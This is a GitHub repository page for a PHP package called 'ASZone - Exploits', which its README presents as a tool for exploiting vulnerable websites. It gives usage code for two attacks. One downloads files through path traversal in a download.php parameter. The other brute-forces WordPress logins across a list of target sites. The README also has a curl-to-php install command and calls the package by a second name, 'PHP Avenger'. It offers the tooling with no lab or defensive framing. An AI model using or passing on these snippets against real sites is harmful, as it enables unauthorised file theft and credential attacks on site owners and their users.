Skip to content

aszone/exploits

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 

Repository files navigation

ASZone - Exploits

ASZone - Exploits - Local File Download ASZone - Exploits - Brute Force in WordPress

Beta

Reading Static File is a open source package for exploting vulnerables sites

Instalation

The recommended way to install PHP Avenger is through Composer.

# Install Composer
curl -sS https://getcomposer.org/installer | php


## Basic Usage Local File Download
```bash
$command=array();
$crawler = new DownloadByLocalFileDownload($command);
$url="http://www.xxxx.com/download.php?file=../../index.php";
$crawler->getAllFiles($url);

Basic Usage Brute Force in WordPress

$command=array();
$btwp = new BruteForceWordPress($command);

$listSite[]='http://www.site1.org.br/wp-login.php';
$listSite[]='http://site2.com.br/wp-login.php';
$btwp->execute($listSite);

Help and docs

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Packages

No packages published

Contributors 3

  •  
  •  
  •  

Languages